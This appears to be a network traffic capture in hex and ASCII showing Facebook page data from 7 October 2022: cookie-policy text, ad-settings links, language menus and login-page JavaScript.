6d 61 74 69 6f 6e 20 77 65 20 72 65 63 65 69 76 65 20 66 72 6f 6d 20 63 6f 6f 6b 69 65 73 20 6f 6e 20 61 6e 64 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 5c 75 Data Ascii: content on Facebook Products\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_2myvABqqKqq sx_7e7a44\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide a safer experience by using information we receive from cookies on and off Facebook\u
2022-10-07 13:59:18 UTC	565	IN	Data Raw: 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 56 6b 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 Data Ascii: \u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_Vk\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan cla
2022-10-07 13:59:18 UTC	566	IN	Data Raw: 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 Data Ascii: ttings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you're seeing a particular ad and control how we use information that we collect to s
2022-10-07 13:59:18 UTC	568	IN	Data Raw: 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 33 6b 5a 58 35 77 58 68 7a 34 36 6a 66 4b 57 6c 4b 47 6f 6f 57 6f 4e 4e 41 78 4e 6e 57 49 74 Data Ascii: can opt out of seeing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&h=AT3kZX5wXhz46jfKWlKGooWoNNAxNnWIt
2022-10-07 13:59:18 UTC	569	IN	Data Raw: 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 61 64 76 65 72 74 69 73 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65 72 76 69 63 65 73 2e 20 54 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 68 6f 77 20 61 64 76 65 72 74 69 73 65 72 73 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 74 68 65 20 63 68 6f 69 63 65 73 20 74 68 65 79 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 Data Ascii: 03C\/p>\u003Cp class=\"_9o-m\">The advertising companies we work with generally use cookies and similar technologies as part of their services. To learn more about how advertisers generally use cookies and the choices they offer, you can review the follow
2022-10-07 13:59:18 UTC	571	IN	Data Raw: 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 62 5f 63 34 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 Data Ascii: u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_b_c4\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling c
2022-10-07 13:59:18 UTC	572	IN	Data Raw: 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 68 65 6c 70 5c 75 30 30 32 35 32 46 31 37 34 34 32 5c 75 30 30 32 35 32 46 77 69 6e 64 6f 77 73 2d 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 31 6d 56 57 79 45 4e 77 68 71 46 73 6b 71 71 4f 71 52 75 31 69 48 66 62 6f 66 4b 61 5f 6e 32 67 7a 51 6d 67 62 62 74 62 6c 49 36 44 36 4c 39 59 46 Data Ascii: 3Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\u00252Fen-ie\u00252Fhelp\u00252F17442\u00252Fwindows-internet-explorer-delete-manage-cookies&h=AT1mVWyENwhqFskqqOqRu1iHfbofKa_n2gzQmgbbtblI6D6L9YF
2022-10-07 13:59:18 UTC	574	IN	Data Raw: 6e 52 75 4d 75 38 76 69 4a 38 71 74 2d 54 50 32 73 45 37 61 47 44 30 2d 55 42 31 6f 69 43 38 63 4b 61 50 72 70 36 51 4f 32 4f 36 6b 39 6b 46 66 43 7a 4d 74 47 56 4b 67 76 49 6a 66 4d 48 42 31 59 6e 66 65 78 34 64 58 6f 67 58 41 61 57 4f 72 78 47 6f 49 48 63 34 42 64 31 78 4c 6c 76 6b 70 45 7a 78 6e 6c 66 74 71 46 58 70 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f Data Ascii: nRuMu8viJ8qt-TP2sE7aGD0-UB1oiC8cKaPrp6QO2O6k9kFfCzMtGVKgvIjfMHB1Ynfex4dXogXAaWOrxGoIHc4Bd1xLlvkpEzxnlftqFXpg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/
2022-10-07 13:59:18 UTC	575	IN	Data Raw: 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 34 44 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 65 75 74 73 63 68 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 31 52 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 6a 50 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 68 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 Data Ascii: ":"Dansk"},1],["__markup_3310c079_0_2_4D",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_1R",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_jP",{"__html":"English (US)"},1],["__markup_3310c079_0_5_hM",{"__html":"Espa\u00f1ol"},1],["__markup_3310c07
2022-10-07 13:59:18 UTC	577	IN	Data Raw: 5f 30 5f 70 5f 64 62 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 2b 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 65 4a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 49 53 22 2c 7b 22 5f 5f 68 74 6d Data Ascii: _0_p_db",{"__html":"\u0939\u093f\u0928\u094d\u0926\u0940"},1],["__markup_3310c079_0_q_+X",{"__html":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_eJ",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_IS",{"__htm
2022-10-07 13:59:18 UTC	578	IN	Data Raw: 68 22 2c 22 73 65 74 22 2c 5b 5d 2c 5b 22 5c 2f 34 6f 68 34 2e 70 68 70 22 2c 22 38 66 61 65 63 34 35 30 22 2c 7b 22 69 6d 70 5f 69 64 22 3a 22 31 64 6a 49 48 6a 73 4a 58 68 39 47 59 73 52 47 34 22 2c 22 65 66 5f 70 61 67 65 22 3a 6e 75 6c 6c 2c 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 Data Ascii: h","set",[],["\/4oh4.php","8faec450",{"imp_id":"1djIHjsJXh9GYsRG4","ef_page":null,"uri":"https:\/\/www.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mys
2022-10-07 13:59:18 UTC	580	IN	Data Raw: 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 2d 2d 73 61 6e 69 74 69 7a 65 64 2d 2d 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 62 52 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 Data Ascii: 02520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=--sanitized--"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_bR"],[{"__m":"__elem_a
2022-10-07 13:59:18 UTC	581	IN	Data Raw: 6e 44 69 6d 65 6e 73 69 6f 6e 73 41 75 74 6f 53 65 74 22 2c 22 73 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 6b 43 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 6b 43 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 75 70 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 78 49 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 75 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 78 49 22 7d 2c 6e 75 6c 6c 2c 74 72 Data Ascii: nDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_kC"],[{"__m":"__elem_f46f4946_0_1_kC"}]],["LoginFormController","init",["__elem_835c633a_0_0_up","__elem_45d73b5d_0_2_xI"],[{"__m":"__elem_835c633a_0_0_up"},{"__m":"__elem_45d73b5d_0_2_xI"},null,tr
2022-10-07 13:59:18 UTC	583	IN	Data Raw: 5f 30 5f 31 5f 69 4d 22 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 62 77 22 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 69 58 22 7d 2c 66 61 6c 73 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 52 75 6e 29 7b 52 75 6e 2e 6f 6e 41 66 74 65 72 4c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 74 72 79 20 7b 20 24 28 22 65 6d 61 69 6c 22 29 2e 66 6f 63 75 73 28 29 3b 20 Data Ascii: _0_1_iM"},true],[{"__m":"__elem_a588f507_0_2_bw"},true],[{"__m":"__elem_9f5fac15_0_0_iX"},false]]});requireLazy(["Run"],function(Run){Run.onAfterLoad(function(){s.cleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){try { $("email").focus();
2022-10-07 13:59:18 UTC	584	IN	Data Raw: 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6e 2f 72 2f 47 32 6d 61 49 71 32 6b 57 43 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 68 6c 44 4f 4f 4a 4e 77 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 72 2f 74 6a 49 55 4a 55 51 38 36 4d 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 68 6c 44 4f 4f 4a 4e 77 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 Data Ascii: atic.xx.fbcdn.net/rsrc.php/v3/yn/r/G2maIq2kWCV.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="hlDOOJNw" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/tjIUJUQ86MO.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="hlDOOJNw" /><link rel="preloa
2022-10-07 13:59:18 UTC	585	IN	Data Raw: 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 68 6c 44 4f 4f 4a 4e 77 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 7b 64 69 73 70 6c 61 79 52 65 73 6f 75 72 63 65 73 3a 5b 22 51 4d 6d 34 47 43 6d 22 2c 22 62 7a 34 30 48 6f 72 22 2c 22 4a 4f 4c 4c 30 34 32 22 2c 22 6d 78 53 6b 66 38 42 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 76 47 74 32 6d 78 7a 22 2c Data Ascii: Pipe.beforePageletArrive("first_response",n);})})();</script><script nonce="hlDOOJNw">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["QMm4GCm","bz40Hor","JOLL042","mxSkf8B","n6W4xMH","8zbEZtu","hKY0QKT","vGt2mxz",
2022-10-07 13:59:18 UTC	587	IN	Data Raw: 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 30 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 30 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 30 2c 45 76 65 6e 74 3a 31 7d 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 31 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 31 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 31 2c 45 76 65 6e 74 3a 31 30 30 7d 2c 65 6e 61 62 6c 65 5f 68 65 61 72 74 62 65 61 74 3a 74 72 75 65 2c 6d 61 78 42 6c 6f 63 6b 4d 65 72 67 65 44 75 72 61 74 69 6f 6e 3a 30 2c 6d 61 78 42 6c 6f 63 6b 4d 65 72 67 65 44 69 73 74 61 6e 63 65 3a 30 2c 65 6e 61 62 Data Ascii: flip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:1},interaction_to_coinflip:{ADS_INTERFACES_INTERACTION:1,ads_perf_scenario:1,ads_wait_time:1,Event:100},enable_heartbeat:true,maxBlockMergeDuration:0,maxBlockMergeDistance:0,enab
2022-10-07 13:59:18 UTC	588	IN	Data Raw: 31 5d 2c 5b 22 63 72 3a 31 31 30 38 38 35 37 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 38 63 57 31 75 31 64 6e 59 43 36 66 76 52 37 76 52 4a 76 6b 68 42 66 68 30 79 78 56 59 73 32 71 4a 32 42 79 64 70 48 4e 7a 6a 44 69 6f 64 7a 56 78 48 73 50 43 54 6f 79 39 62 77 76 6f 54 49 6e 7a 68 37 66 69 50 42 56 59 63 71 4d 63 51 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 32 39 34 31 35 38 22 2c 5b 22 52 65 61 63 74 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 33 62 75 37 47 77 79 6e 65 45 56 48 66 4f 69 50 54 68 5f 4a 59 33 4f 51 62 58 76 4d 2d 34 6e 6d 65 72 47 56 45 4d 50 65 55 6d 78 56 63 5a 41 4d 62 4f 42 36 66 5f 31 6f 6e 50 4e 6f 47 78 78 36 41 44 36 56 72 5a 30 4c 4c 67 Data Ascii: 1],["cr:1108857",[],{__rc:[null,"Aa18cW1u1dnYC6fvR7vRJvkhBfh0yxVYs2qJ2BydpHNzjDiodzVxHsPCToy9bwvoTInzh7fiPBVYcqMcQg"]},-1],["cr:1294158",["React.classic"],{__rc:["React.classic","Aa3bu7GwyneEVHfOiPTh_JY3OQbXvM-4nmerGVEMPeUmxVcZAMbOB6f_1onPNoGxx6AD6VrZ0LLg
2022-10-07 13:59:18 UTC	590	IN	Data Raw: 72 65 5f 6c 6f 67 67 69 6e 67 22 5d 2c 73 68 6f 75 6c 64 5f 64 72 6f 70 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 74 72 75 65 2c 73 68 6f 75 6c 64 5f 6c 6f 67 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 66 61 6c 73 65 7d 2c 37 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 72 65 6c 6f 61 64 4f 6e 42 6f 6f 74 6c 6f 61 64 45 72 72 6f 72 3a 74 72 75 65 7d 2c 31 30 36 37 5d 2c 5b 22 63 72 3a 36 39 32 32 30 39 22 2c 5b 22 63 61 6e 63 65 6c 49 64 6c 65 43 61 6c 6c 62 61 63 6b 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 63 61 6e 63 65 6c 49 64 6c 65 43 61 6c 6c 62 61 63 6b 42 6c 75 65 22 2c 22 41 61 32 5f 64 4f 4b 50 4c 6f 6c 67 36 55 67 68 46 41 75 70 37 2d 77 50 4e 67 39 4c 39 63 47 31 4d 30 38 66 4e 31 Data Ascii: re_logging"],should_drop_unknown_routes:true,should_log_unknown_routes:false},7],["PageTransitionsConfig",[],{reloadOnBootloadError:true},1067],["cr:692209",["cancelIdleCallbackBlue"],{__rc:["cancelIdleCallbackBlue","Aa2_dOKPLolg6UghFAup7-wPNg9L9cG1M08fN1
2022-10-07 13:59:18 UTC	591	IN	Data Raw: 61 79 2d 72 44 43 6e 63 6d 6e 5f 56 47 63 33 57 55 4a 32 6b 4f 53 6e 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 33 32 35 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 44 61 74 61 22 2c 5b 5d 2c 7b 6e 65 65 64 73 46 75 6c 6c 55 70 64 61 74 65 3a 74 72 75 65 2c 6e 65 65 64 73 50 61 72 74 69 61 6c 55 70 64 61 74 65 3a 66 61 6c 73 65 2c 73 68 6f 75 6c 64 4c 6f 67 52 65 73 6f 75 72 63 65 50 65 72 66 3a 66 61 6c 73 65 7d 2c 33 39 37 37 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 4c 6f 67 67 69 6e 67 55 52 49 22 2c 5b 5d 2c 7b 75 72 69 3a 22 2f 61 6a 61 78 2f 77 65 62 Data 